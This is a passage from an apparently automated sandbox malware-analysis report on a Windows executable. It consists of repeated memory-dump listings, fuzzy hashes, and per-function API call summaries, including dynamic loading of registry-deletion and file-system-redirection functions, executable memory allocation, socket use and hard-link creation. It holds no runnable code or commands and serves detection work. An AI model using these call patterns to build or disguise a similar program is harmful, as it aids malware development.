                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 5a6653c7dd844d66aaa4d7c068a2ffbb228a33ac7cb65767fdb5b8a1ef9de0b0
                                                • Instruction ID: b9916d39b40972336f100d55016000f9eb54b5bd4479a1438dad4eb7b538ae6a
                                                • Opcode Fuzzy Hash: 5a6653c7dd844d66aaa4d7c068a2ffbb228a33ac7cb65767fdb5b8a1ef9de0b0
                                                • Instruction Fuzzy Hash: 2DD01771911713CFD731AF32D91868A76E8BF06361F12882E94E6DA164E6B4E880EB50
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,01001039), ref: 01000DF5
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01000E07
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: f04669060e76aae3bb6db0da44a96fe9f2f1435c871717b5a347bd697ed8481f
                                                • Instruction ID: 73e09b5205865201ca1a0e52b918ae0fe5d7c7b614ded47bb01414bbdfa49d29
                                                • Opcode Fuzzy Hash: f04669060e76aae3bb6db0da44a96fe9f2f1435c871717b5a347bd697ed8481f
                                                • Instruction Fuzzy Hash: 0ED0E2705107238FE7329B7AC80868676E9AF45396F11886EA5C6E6184E6B5D8D08B50
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84BD0,?,00F84DEF,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84C11
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F84C23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: 001d4ba9c3b34ee6672bb280b657cb8df0a4597a418c14b3d8a51a861bdcc447
                                                • Instruction ID: e77d4588b43545dc88e31ca590770cf59647df64479784fb3346de8528c611d6
                                                • Opcode Fuzzy Hash: 001d4ba9c3b34ee6672bb280b657cb8df0a4597a418c14b3d8a51a861bdcc447
                                                • Instruction Fuzzy Hash: B3D01231911723CFD731AF71D918686B6D9EF0A351F118C2D94C5D6250E6B4E880DB51
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00FF8CF4,?,0100F910), ref: 00FF90EE
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FF9100
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: 2244f8d0d90e4d0659605c4e633ac74c3f5e1a299e2e001b352ec5e66f840b5f
                                                • Instruction ID: d5059867d20dbddb0d6bab222a154a0eb79ac96e6309df8b0e959cbdff4b23c8
                                                • Opcode Fuzzy Hash: 2244f8d0d90e4d0659605c4e633ac74c3f5e1a299e2e001b352ec5e66f840b5f
                                                • Instruction Fuzzy Hash: CED01234914713CFD7319F31D41865676D4AF05351F11C83E96C5D6664E6B5C880DB90
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                • Opcode ID: fdf865d1c8eecc4b50167b9f45317e4cdb63aa567ff074dcd5f984ee5be271d2
                                                • Instruction ID: 7740faaa4a7ce1e0d6975bb62350735fc410f5c2eccdd70d2492b83a3d17c5ab
                                                • Opcode Fuzzy Hash: fdf865d1c8eecc4b50167b9f45317e4cdb63aa567ff074dcd5f984ee5be271d2
                                                • Instruction Fuzzy Hash: 61D0127380410AEAC7119790998AFF9777CBF0A301F14045AF806A2141E235C7B8FB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                                                • Instruction ID: fab0e42b4d8ceca21a7b5955778a2b4ed6d15b53dcfdf49e5dc2acecd8fe4cdf
                                                • Opcode Fuzzy Hash: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                                                • Instruction Fuzzy Hash: 51C16E75A04216EFCB15DF94C884AAEBBB6FF48314B18859AE805DF351E730DD81EB90
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 00FFE0BE
                                                • CharLowerBuffW.USER32(?,?), ref: 00FFE101
                                                  • Part of subcall function 00FFD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFD7C5
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00FFE301
                                                • _memmove.LIBCMT ref: 00FFE314
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                • Opcode ID: 087cbf33a9aae426c4d2d96f9f095081dd9feadb8e13382d8d885b48cf4b208c
                                                • Instruction ID: 82ed496bbf12d475883c4c24aa954396a3cd8936f8749a4fba07fc475bcb73e1
                                                • Opcode Fuzzy Hash: 087cbf33a9aae426c4d2d96f9f095081dd9feadb8e13382d8d885b48cf4b208c
                                                • Instruction Fuzzy Hash: FDC18C71A08305CFC714DF28C880A6ABBE4FF89724F14896EF9999B361D731E945DB81
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00FF80C3
                                                • CoUninitialize.OLE32 ref: 00FF80CE
                                                  • Part of subcall function 00FDD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDD5D4
                                                • VariantInit.OLEAUT32(?), ref: 00FF80D9
                                                • VariantClear.OLEAUT32(?), ref: 00FF83AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                • Opcode ID: 8c2985ccdd836f816f96c0e4e25444031b0f4866000ece2b29f2c9d3e9329faf
                                                • Instruction ID: 8131d229e181193b5174981dd506c23dbf5deb7c77899efcf0ea5432fb941bb3
                                                • Opcode Fuzzy Hash: 8c2985ccdd836f816f96c0e4e25444031b0f4866000ece2b29f2c9d3e9329faf
                                                • Instruction Fuzzy Hash: 58A169356087069FCB10EF14C881B6AB7E4BF89764F08444CFA969B3A1CB74ED05EB42
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD76EA
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7702
                                                • CLSIDFromProgID.OLE32(?,?,00000000,0100FB80,000000FF,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7727
                                                • _memcmp.LIBCMT ref: 00FD7748
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: eee1f968246cc9eab830e710ffd1e8afb9f4446dbe515d22913212b1bb8d547b
                                                • Instruction ID: 82adee134a8e56b2af35e08ee5bce087f5bdcc940b28ce0eda28c1031d13d610
                                                • Opcode Fuzzy Hash: eee1f968246cc9eab830e710ffd1e8afb9f4446dbe515d22913212b1bb8d547b
                                                • Instruction Fuzzy Hash: 9D813175900209EFCB00EFA4C984EEEB7B9FF89315F244559F505AB250EB71AE05DB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: 8d36a07cbdaf033ec1bc6d4624c84ad2037cd351ae44159269b7f834c44a3f27
                                                • Instruction ID: a618d0815728115f2484683221d982fd664e5590afc9fb8491fe8af2dc12c5ee
                                                • Opcode Fuzzy Hash: 8d36a07cbdaf033ec1bc6d4624c84ad2037cd351ae44159269b7f834c44a3f27
                                                • Instruction Fuzzy Hash: A551B0756043029ACB24AF65D891B7AB3E6AF45314F28C81FE5C6DB392DF78D881B701
                                                APIs
                                                • GetWindowRect.USER32(0191E4C8,?), ref: 01009863
                                                • ScreenToClient.USER32(00000002,00000002), ref: 01009896
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01009903
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: 52ea88faba24a8da47f468672b95f383d60ab9fd14828a813b49a709e870fe0c
                                                • Instruction ID: 711f548b2adfcb04467c8cbc45f961b713cfb8f06cd995b4e28eee78cbe30122
                                                • Opcode Fuzzy Hash: 52ea88faba24a8da47f468672b95f383d60ab9fd14828a813b49a709e870fe0c
                                                • Instruction Fuzzy Hash: 31515374900205EFEF22DF68C980AAE7BF5FF45364F108199F999A7292D731AA41CB50
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FD9AD2
                                                • __itow.LIBCMT ref: 00FD9B03
                                                  • Part of subcall function 00FD9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FD9DBE
                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FD9B6C
                                                • __itow.LIBCMT ref: 00FD9BC3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: 8d2faa09c47d74d65e7dd884a2e4f94195376d58e795d6de7545a0070b6b5cf0
                                                • Instruction ID: 8035cb3fc9c038a0735a2626a8363c1ce63ca62c1b028ee7f3bb458cf2217675
                                                • Opcode Fuzzy Hash: 8d2faa09c47d74d65e7dd884a2e4f94195376d58e795d6de7545a0070b6b5cf0
                                                • Instruction Fuzzy Hash: 2541A170A04308ABDF21EF50DC46BEE7BBAEF85720F04005AF905A7391DBB49A44EB51
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00FF69D1
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF69E1
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FF6A45
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF6A51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                • Opcode ID: 4bdeceee4098d39cbd089aecba4624d4bf5e46afa364924b528b70e13bb4281f
                                                • Instruction ID: 9396c5d245577ad8a21b402112be1148b582706308e2dd16f47d834e9bd112f1
                                                • Opcode Fuzzy Hash: 4bdeceee4098d39cbd089aecba4624d4bf5e46afa364924b528b70e13bb4281f
                                                • Instruction Fuzzy Hash: B441A375740201AFEB61BF24CC86F7A77A49F04B14F48801CFA59EB2D2DBB99D01A791
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0100F910), ref: 00FF64A7
                                                • _strlen.LIBCMT ref: 00FF64D9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                • Opcode ID: a5d0f72299a9713d6a719706e79555af7d699988defb38cc7aa6ab4abaeb6c36
                                                • Instruction ID: 910697ccf29dbaf37de771561277aee3974a65af2870bbd938f676174775ee7d
                                                • Opcode Fuzzy Hash: a5d0f72299a9713d6a719706e79555af7d699988defb38cc7aa6ab4abaeb6c36
                                                • Instruction Fuzzy Hash: A541D635900108ABCB14FB64DC85FFEB7A9AF04714F188159F915E72A2DF34AE04E750
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FEB89E
                                                • GetLastError.KERNEL32(?,00000000), ref: 00FEB8C4
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FEB8E9
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FEB915
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: e20b0664f7d11a32990c4ca7f315eb16a4e209332fdee7c7342534604ad9b2fe
                                                • Instruction ID: 516cf096b5540e0067c1cf79a0251ff39a61e89d86ed48617c6ea32c86d82120
                                                • Opcode Fuzzy Hash: e20b0664f7d11a32990c4ca7f315eb16a4e209332fdee7c7342534604ad9b2fe
                                                • Instruction Fuzzy Hash: 06414F35A00551DFCB11EF15C844A6EBBE1EF49324F498088ED4A9B362CB78FD01EB91
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010088DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: b5b56296902358420fe36b92060495f598bd1d7e9990e5120ebd42aec2b7ebc0
                                                • Instruction ID: c3fbfc3c05ae5159713cce0b63d07f2e2b694f9618cdbae40e46840ffc638459
                                                • Opcode Fuzzy Hash: b5b56296902358420fe36b92060495f598bd1d7e9990e5120ebd42aec2b7ebc0
                                                • Instruction Fuzzy Hash: F131B334A04109AFFB73AA68DC45BAC7BA5FB06310F588153F6D1E62E1C635E6409B52
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0100AB60
                                                • GetWindowRect.USER32(?,?), ref: 0100ABD6
                                                • PtInRect.USER32(?,?,0100C014), ref: 0100ABE6
                                                • MessageBeep.USER32(00000000), ref: 0100AC57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
